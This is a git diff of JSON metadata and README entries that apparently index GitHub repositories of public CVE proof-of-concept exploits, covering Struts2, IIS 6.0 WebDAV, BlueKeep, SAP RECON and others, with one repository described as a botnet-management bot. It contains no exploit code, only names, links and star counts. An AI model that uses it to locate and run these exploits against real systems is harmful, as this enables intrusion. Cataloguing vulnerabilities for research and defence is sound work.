"html_url": "https:\/\/github.com\/JiounDai"
},
"html_url": "https:\/\/github.com\/JiounDai\/CVE-2017-0478",
"description": "poc of CVE-2017-0478",
"fork": false,
"created_at": "2017-03-19T02:18:37Z",
"updated_at": "2018-08-02T19:14:29Z",
"pushed_at": "2017-03-19T02:43:19Z",
"stargazers_count": 8,
"watchers_count": 8,
"forks_count": 5,
"forks": 5,
"watchers": 8,
"score": 0
},
{ {
"id": 141312944, "id": 141312944,
"name": "CVE-2017-0478", "name": "CVE-2017-0478",

View file

@ -1,73 +1,4 @@
[ [
{
"id": 80148945,
"name": "extra_recipe",
"full_name": "maximehip\/extra_recipe",
"owner": {
"login": "maximehip",
"id": 6273425,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/6273425?v=4",
"html_url": "https:\/\/github.com\/maximehip"
},
"html_url": "https:\/\/github.com\/maximehip\/extra_recipe",
"description": "Ian Beer's exploit for CVE-2017-2370 (kernel memory r\/w on iOS 10.2) https:\/\/bugs.chromium.org\/p\/project-zero\/issues\/detail?id=1004",
"fork": false,
"created_at": "2017-01-26T19:47:43Z",
"updated_at": "2017-01-26T19:48:19Z",
"pushed_at": "2017-01-26T19:48:18Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
},
{
"id": 80717942,
"name": "extra_recipe",
"full_name": "JackBro\/extra_recipe",
"owner": {
"login": "JackBro",
"id": 21210712,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/21210712?v=4",
"html_url": "https:\/\/github.com\/JackBro"
},
"html_url": "https:\/\/github.com\/JackBro\/extra_recipe",
"description": "Ian Beer's exploit for CVE-2017-2370 (kernel memory r\/w on iOS 10.2)",
"fork": false,
"created_at": "2017-02-02T11:16:38Z",
"updated_at": "2017-10-14T08:34:32Z",
"pushed_at": "2017-01-27T17:44:09Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{
"id": 81874110,
"name": "extra_recipe-iOS-10.2",
"full_name": "Rootkitsmm\/extra_recipe-iOS-10.2",
"owner": {
"login": "Rootkitsmm",
"id": 5567904,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/5567904?v=4",
"html_url": "https:\/\/github.com\/Rootkitsmm"
},
"html_url": "https:\/\/github.com\/Rootkitsmm\/extra_recipe-iOS-10.2",
"description": "CVE-2017-2370",
"fork": false,
"created_at": "2017-02-13T21:32:40Z",
"updated_at": "2019-01-03T05:45:15Z",
"pushed_at": "2017-02-01T11:36:26Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 4,
"forks": 4,
"watchers": 1,
"score": 0
},
{ {
"id": 142854846, "id": 142854846,
"name": "CVE-2017-2370", "name": "CVE-2017-2370",

View file

@ -1,25 +0,0 @@
[
{
"id": 84497885,
"name": "cve-2017-2636-el",
"full_name": "alexzorin\/cve-2017-2636-el",
"owner": {
"login": "alexzorin",
"id": 311534,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/311534?v=4",
"html_url": "https:\/\/github.com\/alexzorin"
},
"html_url": "https:\/\/github.com\/alexzorin\/cve-2017-2636-el",
"description": "Ansible role for workaround for CVE-2017-2636 (Red Hat) - https:\/\/access.redhat.com\/security\/cve\/CVE-2017-2636",
"fork": false,
"created_at": "2017-03-09T23:20:42Z",
"updated_at": "2017-03-18T16:23:19Z",
"pushed_at": "2017-03-09T23:21:14Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"forks": 0,
"watchers": 1,
"score": 0
}
]

View file

@ -1,27 +1,4 @@
[ [
{
"id": 79682713,
"name": "CVE-2017-3730",
"full_name": "guidovranken\/CVE-2017-3730",
"owner": {
"login": "guidovranken",
"id": 6846644,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/6846644?v=4",
"html_url": "https:\/\/github.com\/guidovranken"
},
"html_url": "https:\/\/github.com\/guidovranken\/CVE-2017-3730",
"description": "OpenSSL CVE-2017-3730 proof-of-concept",
"fork": false,
"created_at": "2017-01-22T00:40:34Z",
"updated_at": "2018-12-04T20:01:55Z",
"pushed_at": "2017-01-26T01:30:54Z",
"stargazers_count": 11,
"watchers_count": 11,
"forks_count": 5,
"forks": 5,
"watchers": 11,
"score": 0
},
{ {
"id": 97466064, "id": 97466064,
"name": "OpenSSL-CVE-2017-3730", "name": "OpenSSL-CVE-2017-3730",

View file

@ -1,280 +1,4 @@
[ [
{
"id": 84158718,
"name": "S2-045",
"full_name": "PolarisLab\/S2-045",
"owner": {
"login": "PolarisLab",
"id": 25890110,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/25890110?v=4",
"html_url": "https:\/\/github.com\/PolarisLab"
},
"html_url": "https:\/\/github.com\/PolarisLab\/S2-045",
"description": "Struts2 S2-045CVE-2017-5638Vulnerability environment - http:\/\/www.mottoin.com\/97954.html",
"fork": false,
"created_at": "2017-03-07T05:30:30Z",
"updated_at": "2019-06-29T02:30:57Z",
"pushed_at": "2017-03-07T05:37:55Z",
"stargazers_count": 24,
"watchers_count": 24,
"forks_count": 12,
"forks": 12,
"watchers": 24,
"score": 0
},
{
"id": 84186490,
"name": "Struts2-045-Exp",
"full_name": "Flyteas\/Struts2-045-Exp",
"owner": {
"login": "Flyteas",
"id": 15673913,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/15673913?v=4",
"html_url": "https:\/\/github.com\/Flyteas"
},
"html_url": "https:\/\/github.com\/Flyteas\/Struts2-045-Exp",
"description": "Struts2 S2-045CVE-2017-5638Exp with GUI",
"fork": false,
"created_at": "2017-03-07T10:30:20Z",
"updated_at": "2020-04-10T02:04:59Z",
"pushed_at": "2017-03-13T06:30:41Z",
"stargazers_count": 61,
"watchers_count": 61,
"forks_count": 29,
"forks": 29,
"watchers": 61,
"score": 0
},
{
"id": 84277596,
"name": "cve-2017-5638",
"full_name": "bongbongco\/cve-2017-5638",
"owner": {
"login": "bongbongco",
"id": 3170006,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/3170006?v=4",
"html_url": "https:\/\/github.com\/bongbongco"
},
"html_url": "https:\/\/github.com\/bongbongco\/cve-2017-5638",
"description": null,
"fork": false,
"created_at": "2017-03-08T04:17:33Z",
"updated_at": "2017-03-08T04:31:28Z",
"pushed_at": "2017-03-08T04:31:26Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
},
{
"id": 84481525,
"name": "S2-045-EXP-POC-TOOLS",
"full_name": "jas502n\/S2-045-EXP-POC-TOOLS",
"owner": {
"login": "jas502n",
"id": 16593068,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/16593068?v=4",
"html_url": "https:\/\/github.com\/jas502n"
},
"html_url": "https:\/\/github.com\/jas502n\/S2-045-EXP-POC-TOOLS",
"description": "S2-045 漏洞 POC-TOOLS CVE-2017-5638",
"fork": false,
"created_at": "2017-03-09T19:40:47Z",
"updated_at": "2020-06-16T02:37:44Z",
"pushed_at": "2017-03-09T19:50:50Z",
"stargazers_count": 21,
"watchers_count": 21,
"forks_count": 18,
"forks": 18,
"watchers": 21,
"score": 0
},
{
"id": 84518902,
"name": "strutszeiro",
"full_name": "mthbernardes\/strutszeiro",
"owner": {
"login": "mthbernardes",
"id": 12648924,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/12648924?v=4",
"html_url": "https:\/\/github.com\/mthbernardes"
},
"html_url": "https:\/\/github.com\/mthbernardes\/strutszeiro",
"description": "Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638)",
"fork": false,
"created_at": "2017-03-10T04:23:41Z",
"updated_at": "2020-05-11T01:31:47Z",
"pushed_at": "2017-03-11T04:11:39Z",
"stargazers_count": 38,
"watchers_count": 38,
"forks_count": 27,
"forks": 27,
"watchers": 38,
"score": 0
},
{
"id": 84581800,
"name": "cve-2017-5638",
"full_name": "xsscx\/cve-2017-5638",
"owner": {
"login": "xsscx",
"id": 10790582,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/10790582?v=4",
"html_url": "https:\/\/github.com\/xsscx"
},
"html_url": "https:\/\/github.com\/xsscx\/cve-2017-5638",
"description": "Example PoC Code for CVE-2017-5638 | Apache Struts Exploit ",
"fork": false,
"created_at": "2017-03-10T16:56:14Z",
"updated_at": "2020-06-27T11:29:42Z",
"pushed_at": "2017-03-12T15:43:27Z",
"stargazers_count": 11,
"watchers_count": 11,
"forks_count": 20,
"forks": 20,
"watchers": 11,
"score": 0
},
{
"id": 84602394,
"name": "apache-struts2-CVE-2017-5638",
"full_name": "immunio\/apache-struts2-CVE-2017-5638",
"owner": {
"login": "immunio",
"id": 6700387,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/6700387?v=4",
"html_url": "https:\/\/github.com\/immunio"
},
"html_url": "https:\/\/github.com\/immunio\/apache-struts2-CVE-2017-5638",
"description": "Demo Application and Exploit",
"fork": false,
"created_at": "2017-03-10T21:33:25Z",
"updated_at": "2020-05-29T01:57:57Z",
"pushed_at": "2017-03-13T15:03:32Z",
"stargazers_count": 37,
"watchers_count": 37,
"forks_count": 36,
"forks": 36,
"watchers": 37,
"score": 0
},
{
"id": 84620334,
"name": "OgnlContentTypeRejectorValve",
"full_name": "Masahiro-Yamada\/OgnlContentTypeRejectorValve",
"owner": {
"login": "Masahiro-Yamada",
"id": 479387,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/479387?v=4",
"html_url": "https:\/\/github.com\/Masahiro-Yamada"
},
"html_url": "https:\/\/github.com\/Masahiro-Yamada\/OgnlContentTypeRejectorValve",
"description": "This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)",
"fork": false,
"created_at": "2017-03-11T03:18:12Z",
"updated_at": "2017-04-11T00:06:36Z",
"pushed_at": "2017-03-13T14:49:25Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"forks": 0,
"watchers": 1,
"score": 0
},
{
"id": 84639178,
"name": "CVE-2017-5638-Apache-Struts2",
"full_name": "aljazceru\/CVE-2017-5638-Apache-Struts2",
"owner": {
"login": "aljazceru",
"id": 4439523,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/4439523?v=4",
"html_url": "https:\/\/github.com\/aljazceru"
},
"html_url": "https:\/\/github.com\/aljazceru\/CVE-2017-5638-Apache-Struts2",
"description": "Tweaking original PoC (https:\/\/github.com\/rapid7\/metasploit-framework\/issues\/8064) to work on self-signed certificates ",
"fork": false,
"created_at": "2017-03-11T09:39:09Z",
"updated_at": "2019-07-15T22:02:37Z",
"pushed_at": "2017-03-11T09:41:27Z",
"stargazers_count": 2,
"watchers_count": 2,
"forks_count": 0,
"forks": 0,
"watchers": 2,
"score": 0
},
{
"id": 84640546,
"name": "test_struts2_vulnerability_CVE-2017-5638",
"full_name": "sjitech\/test_struts2_vulnerability_CVE-2017-5638",
"owner": {
"login": "sjitech",
"id": 5180638,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5180638?v=4",
"html_url": "https:\/\/github.com\/sjitech"
},
"html_url": "https:\/\/github.com\/sjitech\/test_struts2_vulnerability_CVE-2017-5638",
"description": "test struts2 vulnerability CVE-2017-5638 in Mac OS X",
"fork": false,
"created_at": "2017-03-11T10:03:54Z",
"updated_at": "2017-03-13T11:14:00Z",
"pushed_at": "2017-03-13T07:38:25Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{
"id": 84642680,
"name": "CVE-2017-5638",
"full_name": "jrrombaldo\/CVE-2017-5638",
"owner": {
"login": "jrrombaldo",
"id": 121948,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/121948?v=4",
"html_url": "https:\/\/github.com\/jrrombaldo"
},
"html_url": "https:\/\/github.com\/jrrombaldo\/CVE-2017-5638",
"description": null,
"fork": false,
"created_at": "2017-03-11T10:43:16Z",
"updated_at": "2017-03-11T13:07:57Z",
"pushed_at": "2017-03-24T19:12:10Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
},
{
"id": 84644857,
"name": "CVE-2017-5638",
"full_name": "random-robbie\/CVE-2017-5638",
"owner": {
"login": "random-robbie",
"id": 4902869,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/4902869?v=4",
"html_url": "https:\/\/github.com\/random-robbie"
},
"html_url": "https:\/\/github.com\/random-robbie\/CVE-2017-5638",
"description": "CVE: 2017-5638 in different formats",
"fork": false,
"created_at": "2017-03-11T11:22:44Z",
"updated_at": "2017-03-11T11:28:58Z",
"pushed_at": "2017-03-16T11:26:04Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
},
{ {
"id": 84655941, "id": 84655941,
"name": "CVE-2017-5638_struts", "name": "CVE-2017-5638_struts",
@ -321,75 +45,6 @@
"watchers": 372, "watchers": 372,
"score": 0 "score": 0
}, },
{
"id": 84705148,
"name": "Struts-Apache-ExploitPack",
"full_name": "ret2jazzy\/Struts-Apache-ExploitPack",
"owner": {
"login": "ret2jazzy",
"id": 20831187,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/20831187?v=4",
"html_url": "https:\/\/github.com\/ret2jazzy"
},
"html_url": "https:\/\/github.com\/ret2jazzy\/Struts-Apache-ExploitPack",
"description": "These are just some script which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638)",
"fork": false,
"created_at": "2017-03-12T06:28:51Z",
"updated_at": "2020-04-07T06:39:58Z",
"pushed_at": "2017-03-12T07:26:03Z",
"stargazers_count": 17,
"watchers_count": 17,
"forks_count": 13,
"forks": 13,
"watchers": 17,
"score": 0
},
{
"id": 84725982,
"name": "ExpStruts",
"full_name": "lolwaleet\/ExpStruts",
"owner": {
"login": "lolwaleet",
"id": 20018319,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/20018319?v=4",
"html_url": "https:\/\/github.com\/lolwaleet"
},
"html_url": "https:\/\/github.com\/lolwaleet\/ExpStruts",
"description": "A php based exploiter for CVE-2017-5638.",
"fork": false,
"created_at": "2017-03-12T13:03:52Z",
"updated_at": "2020-03-15T16:58:21Z",
"pushed_at": "2017-03-12T13:04:33Z",
"stargazers_count": 2,
"watchers_count": 2,
"forks_count": 2,
"forks": 2,
"watchers": 2,
"score": 0
},
{
"id": 84819853,
"name": "CVE-2017-5638-Apache-Struts2",
"full_name": "oktavianto\/CVE-2017-5638-Apache-Struts2",
"owner": {
"login": "oktavianto",
"id": 8210275,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/8210275?v=4",
"html_url": "https:\/\/github.com\/oktavianto"
},
"html_url": "https:\/\/github.com\/oktavianto\/CVE-2017-5638-Apache-Struts2",
"description": "Example PHP Exploiter for CVE-2017-5638",
"fork": false,
"created_at": "2017-03-13T11:39:55Z",
"updated_at": "2020-04-07T06:38:46Z",
"pushed_at": "2017-03-20T19:40:16Z",
"stargazers_count": 2,
"watchers_count": 2,
"forks_count": 4,
"forks": 4,
"watchers": 2,
"score": 0
},
{ {
"id": 85010282, "id": 85010282,
"name": "cve-2017-5638", "name": "cve-2017-5638",
@ -413,29 +68,6 @@
"watchers": 11, "watchers": 11,
"score": 0 "score": 0
}, },
{
"id": 85145901,
"name": "Strutshock",
"full_name": "opt9\/Strutshock",
"owner": {
"login": "opt9",
"id": 192655,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/192655?v=4",
"html_url": "https:\/\/github.com\/opt9"
},
"html_url": "https:\/\/github.com\/opt9\/Strutshock",
"description": "Struts2 RCE CVE-2017-5638 non-intrusive check shell script",
"fork": false,
"created_at": "2017-03-16T02:59:22Z",
"updated_at": "2017-05-04T20:58:47Z",
"pushed_at": "2017-03-16T04:02:40Z",
"stargazers_count": 3,
"watchers_count": 3,
"forks_count": 1,
"forks": 1,
"watchers": 3,
"score": 0
},
{ {
"id": 85341283, "id": 85341283,
"name": "StrutsShell", "name": "StrutsShell",
@ -459,29 +91,6 @@
"watchers": 3, "watchers": 3,
"score": 0 "score": 0
}, },
{
"id": 85390529,
"name": "CVE-2017-5638",
"full_name": "bhagdave\/CVE-2017-5638",
"owner": {
"login": "bhagdave",
"id": 3230037,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/3230037?v=4",
"html_url": "https:\/\/github.com\/bhagdave"
},
"html_url": "https:\/\/github.com\/bhagdave\/CVE-2017-5638",
"description": null,
"fork": false,
"created_at": "2017-03-18T09:39:59Z",
"updated_at": "2017-03-19T01:25:24Z",
"pushed_at": "2017-03-21T21:53:56Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{ {
"id": 85664016, "id": 85664016,
"name": "st2-046-poc", "name": "st2-046-poc",
@ -528,29 +137,6 @@
"watchers": 1, "watchers": 1,
"score": 0 "score": 0
}, },
{
"id": 85926594,
"name": "S2-Reaper",
"full_name": "gsfish\/S2-Reaper",
"owner": {
"login": "gsfish",
"id": 15968154,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/15968154?v=4",
"html_url": "https:\/\/github.com\/gsfish"
},
"html_url": "https:\/\/github.com\/gsfish\/S2-Reaper",
"description": "CVE-2017-5638",
"fork": false,
"created_at": "2017-03-23T08:44:10Z",
"updated_at": "2017-03-30T09:51:23Z",
"pushed_at": "2017-03-30T10:06:38Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 2,
"forks": 2,
"watchers": 0,
"score": 0
},
{ {
"id": 86200933, "id": 86200933,
"name": "cve-2017-5638", "name": "cve-2017-5638",
@ -574,29 +160,6 @@
"watchers": 0, "watchers": 0,
"score": 0 "score": 0
}, },
{
"id": 86415022,
"name": "Strutscli",
"full_name": "opt9\/Strutscli",
"owner": {
"login": "opt9",
"id": 192655,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/192655?v=4",
"html_url": "https:\/\/github.com\/opt9"
},
"html_url": "https:\/\/github.com\/opt9\/Strutscli",
"description": "Struts2 RCE CVE-2017-5638 CLI shell",
"fork": false,
"created_at": "2017-03-28T04:31:44Z",
"updated_at": "2017-04-14T08:03:48Z",
"pushed_at": "2017-03-28T04:36:11Z",
"stargazers_count": 2,
"watchers_count": 2,
"forks_count": 0,
"forks": 0,
"watchers": 2,
"score": 0
},
{ {
"id": 87695524, "id": 87695524,
"name": "strutsy", "name": "strutsy",

View file

@ -17,8 +17,8 @@
"pushed_at": "2017-05-04T03:06:32Z", "pushed_at": "2017-05-04T03:06:32Z",
"stargazers_count": 39, "stargazers_count": 39,
"watchers_count": 39, "watchers_count": 39,
"forks_count": 9, "forks_count": 10,
"forks": 9, "forks": 10,
"watchers": 39, "watchers": 39,
"score": 0 "score": 0
}, },

View file

@ -1,25 +0,0 @@
[
{
"id": 85539985,
"name": "TYPO3-v7.6.15-Unencrypted-Login-Request",
"full_name": "faizzaidi\/TYPO3-v7.6.15-Unencrypted-Login-Request",
"owner": {
"login": "faizzaidi",
"id": 12153050,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/12153050?v=4",
"html_url": "https:\/\/github.com\/faizzaidi"
},
"html_url": "https:\/\/github.com\/faizzaidi\/TYPO3-v7.6.15-Unencrypted-Login-Request",
"description": "TYPO3 v7.6.15 Unencrypted Login Request Assigned CVE Number: CVE-2017-6370",
"fork": false,
"created_at": "2017-03-20T05:51:07Z",
"updated_at": "2020-07-17T05:22:53Z",
"pushed_at": "2017-03-20T05:51:43Z",
"stargazers_count": 2,
"watchers_count": 2,
"forks_count": 0,
"forks": 0,
"watchers": 2,
"score": 0
}
]

View file

@ -1,27 +1,4 @@
[ [
{
"id": 86543900,
"name": "webdav_exploit",
"full_name": "eliuha\/webdav_exploit",
"owner": {
"login": "eliuha",
"id": 2240516,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/2240516?v=4",
"html_url": "https:\/\/github.com\/eliuha"
},
"html_url": "https:\/\/github.com\/eliuha\/webdav_exploit",
"description": "An exploit for Microsoft IIS 6.0 CVE-2017-7269",
"fork": false,
"created_at": "2017-03-29T05:59:30Z",
"updated_at": "2020-07-12T14:05:27Z",
"pushed_at": "2017-03-29T07:26:41Z",
"stargazers_count": 16,
"watchers_count": 16,
"forks_count": 16,
"forks": 16,
"watchers": 16,
"score": 0
},
{ {
"id": 86573461, "id": 86573461,
"name": "CVE-2017-7269-Echo-PoC", "name": "CVE-2017-7269-Echo-PoC",
@ -45,75 +22,6 @@
"watchers": 84, "watchers": 84,
"score": 0 "score": 0
}, },
{
"id": 86581754,
"name": "CVE-2017-7269-exploit",
"full_name": "caicai1355\/CVE-2017-7269-exploit",
"owner": {
"login": "caicai1355",
"id": 24385053,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/24385053?v=4",
"html_url": "https:\/\/github.com\/caicai1355"
},
"html_url": "https:\/\/github.com\/caicai1355\/CVE-2017-7269-exploit",
"description": "exec 8 bytes command",
"fork": false,
"created_at": "2017-03-29T12:52:54Z",
"updated_at": "2020-04-07T06:37:12Z",
"pushed_at": "2017-03-29T13:08:44Z",
"stargazers_count": 2,
"watchers_count": 2,
"forks_count": 7,
"forks": 7,
"watchers": 2,
"score": 0
},
{
"id": 86659284,
"name": "CVE-2017-7269",
"full_name": "M1a0rz\/CVE-2017-7269",
"owner": {
"login": "M1a0rz",
"id": 25101765,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/25101765?v=4",
"html_url": "https:\/\/github.com\/M1a0rz"
},
"html_url": "https:\/\/github.com\/M1a0rz\/CVE-2017-7269",
"description": "Poc for iis6.0",
"fork": false,
"created_at": "2017-03-30T04:35:13Z",
"updated_at": "2017-03-30T04:35:13Z",
"pushed_at": "2017-03-30T04:35:13Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{
"id": 86697845,
"name": "cve-2017-7269picture",
"full_name": "whiteHat001\/cve-2017-7269picture",
"owner": {
"login": "whiteHat001",
"id": 18191034,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/18191034?v=4",
"html_url": "https:\/\/github.com\/whiteHat001"
},
"html_url": "https:\/\/github.com\/whiteHat001\/cve-2017-7269picture",
"description": null,
"fork": false,
"created_at": "2017-03-30T12:03:05Z",
"updated_at": "2017-03-30T12:03:05Z",
"pushed_at": "2017-03-30T12:11:42Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{ {
"id": 86754251, "id": 86754251,
"name": "cve-2017-7269", "name": "cve-2017-7269",

View file

@ -13,13 +13,13 @@
"description": "Hikvision camera CVE-2017-7921-EXP", "description": "Hikvision camera CVE-2017-7921-EXP",
"fork": false, "fork": false,
"created_at": "2020-04-27T11:49:40Z", "created_at": "2020-04-27T11:49:40Z",
"updated_at": "2020-07-06T10:03:04Z", "updated_at": "2020-08-09T16:20:22Z",
"pushed_at": "2020-05-16T10:43:28Z", "pushed_at": "2020-08-09T15:35:16Z",
"stargazers_count": 6, "stargazers_count": 8,
"watchers_count": 6, "watchers_count": 8,
"forks_count": 1, "forks_count": 1,
"forks": 1, "forks": 1,
"watchers": 6, "watchers": 8,
"score": 0 "score": 0
} }
] ]

View file

@ -1508,13 +1508,13 @@
"description": "Proof of concept for CVE-2019-0708", "description": "Proof of concept for CVE-2019-0708",
"fork": false, "fork": false,
"created_at": "2019-05-29T16:53:54Z", "created_at": "2019-05-29T16:53:54Z",
"updated_at": "2020-08-09T08:23:14Z", "updated_at": "2020-08-09T16:10:49Z",
"pushed_at": "2019-09-03T20:50:28Z", "pushed_at": "2019-09-03T20:50:28Z",
"stargazers_count": 1039, "stargazers_count": 1040,
"watchers_count": 1039, "watchers_count": 1040,
"forks_count": 349, "forks_count": 349,
"forks": 349, "forks": 349,
"watchers": 1039, "watchers": 1040,
"score": 0 "score": 0
}, },
{ {

View file

@ -59,7 +59,7 @@
"description": "Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215", "description": "Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215",
"fork": false, "fork": false,
"created_at": "2019-10-14T17:27:37Z", "created_at": "2019-10-14T17:27:37Z",
"updated_at": "2020-07-16T12:57:34Z", "updated_at": "2020-08-09T18:43:47Z",
"pushed_at": "2019-10-15T01:04:08Z", "pushed_at": "2019-10-15T01:04:08Z",
"stargazers_count": 51, "stargazers_count": 51,
"watchers_count": 51, "watchers_count": 51,

View file

@ -59,13 +59,13 @@
"description": "Some debug notes and exploit(not blind)", "description": "Some debug notes and exploit(not blind)",
"fork": false, "fork": false,
"created_at": "2019-07-26T16:08:40Z", "created_at": "2019-07-26T16:08:40Z",
"updated_at": "2020-06-16T06:46:15Z", "updated_at": "2020-08-09T15:22:02Z",
"pushed_at": "2019-07-28T02:32:07Z", "pushed_at": "2019-07-28T02:32:07Z",
"stargazers_count": 34, "stargazers_count": 35,
"watchers_count": 34, "watchers_count": 35,
"forks_count": 7, "forks_count": 7,
"forks": 7, "forks": 7,
"watchers": 34, "watchers": 35,
"score": 0 "score": 0
}, },
{ {

View file

@ -13,13 +13,13 @@
"description": "Proof of concept exploit of Windows Update Orchestrator Service Elevation of Privilege Vulnerability", "description": "Proof of concept exploit of Windows Update Orchestrator Service Elevation of Privilege Vulnerability",
"fork": false, "fork": false,
"created_at": "2020-07-29T15:56:50Z", "created_at": "2020-07-29T15:56:50Z",
"updated_at": "2020-08-09T11:01:13Z", "updated_at": "2020-08-09T19:25:21Z",
"pushed_at": "2020-07-30T07:48:40Z", "pushed_at": "2020-07-30T07:48:40Z",
"stargazers_count": 96, "stargazers_count": 97,
"watchers_count": 96, "watchers_count": 97,
"forks_count": 15, "forks_count": 15,
"forks": 15, "forks": 15,
"watchers": 96, "watchers": 97,
"score": 0 "score": 0
} }
] ]

View file

@ -13,13 +13,13 @@
"description": "PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)", "description": "PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)",
"fork": false, "fork": false,
"created_at": "2020-07-15T15:20:09Z", "created_at": "2020-07-15T15:20:09Z",
"updated_at": "2020-08-05T19:32:10Z", "updated_at": "2020-08-09T15:16:17Z",
"pushed_at": "2020-07-23T19:45:25Z", "pushed_at": "2020-07-23T19:45:25Z",
"stargazers_count": 111, "stargazers_count": 112,
"watchers_count": 111, "watchers_count": 112,
"forks_count": 36, "forks_count": 37,
"forks": 36, "forks": 37,
"watchers": 111, "watchers": 112,
"score": 0 "score": 0
}, },
{ {

25
2020/CVE-2020-6514.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 286308986,
"name": "CVE-2020-6514",
"full_name": "cudi1999\/CVE-2020-6514",
"owner": {
"login": "cudi1999",
"id": 42251302,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/42251302?v=4",
"html_url": "https:\/\/github.com\/cudi1999"
},
"html_url": "https:\/\/github.com\/cudi1999\/CVE-2020-6514",
"description": null,
"fork": false,
"created_at": "2020-08-09T20:06:50Z",
"updated_at": "2020-08-09T20:13:40Z",
"pushed_at": "2020-08-09T20:10:56Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"forks": 0,
"watchers": 1,
"score": 0
}
]

249
README.md
View file

@ -798,6 +798,14 @@ Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote at
- [ChoKyuWon/CVE-2020-6418](https://github.com/ChoKyuWon/CVE-2020-6418) - [ChoKyuWon/CVE-2020-6418](https://github.com/ChoKyuWon/CVE-2020-6418)
### CVE-2020-6514
<code>
Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to potentially exploit heap corruption via a crafted SCTP stream.
</code>
- [cudi1999/CVE-2020-6514](https://github.com/cudi1999/CVE-2020-6514)
### CVE-2020-6650 ### CVE-2020-6650
<code> <code>
@ -8429,22 +8437,6 @@ The Graphics Device Interface (GDI) in Microsoft Windows Vista SP2; Windows Serv
- [sheri31/0005poc](https://github.com/sheri31/0005poc) - [sheri31/0005poc](https://github.com/sheri31/0005poc)
### CVE-2017-0038
<code>
gdi32.dll in Graphics Device Interface (GDI) in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows remote attackers to obtain sensitive information from process heap memory via a crafted EMF file, as demonstrated by an EMR_SETDIBITSTODEVICE record with modified Device Independent Bitmap (DIB) dimensions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-3216, CVE-2016-3219, and/or CVE-2016-3220.
</code>
- [k0keoyo/CVE-2017-0038-EXP-C-JS](https://github.com/k0keoyo/CVE-2017-0038-EXP-C-JS)
### CVE-2017-0065
<code>
Microsoft Edge allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka &quot;Microsoft Browser Information Disclosure Vulnerability.&quot; This vulnerability is different from those described in CVE-2017-0009, CVE-2017-0011, CVE-2017-0017, and CVE-2017-0068.
</code>
- [Dankirk/cve-2017-0065](https://github.com/Dankirk/cve-2017-0065)
### CVE-2017-0075 ### CVE-2017-0075
<code> <code>
@ -8586,7 +8578,6 @@ An elevation of privilege vulnerability in the Framework APIs could enable a loc
